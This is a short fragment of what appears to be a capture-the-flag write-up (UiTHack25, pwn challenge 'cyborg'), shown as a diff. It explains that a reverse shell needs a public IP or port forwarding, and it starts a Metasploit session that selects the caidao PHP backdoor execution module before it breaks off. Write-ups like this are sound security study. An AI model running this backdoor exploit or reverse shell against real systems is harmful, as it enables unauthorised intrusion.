SondreUM/UiTHack25/pwn/cyborg/writeup/README.md

 This method will only work if you have a public IP address or port forwarding set up on your router to forward the port to your machine, since the reverse shell will be blocked by the firewall.
+As such this is how it can be done if the website is run locally in docker.

 ```sh
 msf6 > use exploit/multi/http/caidao_php_backdoor_exec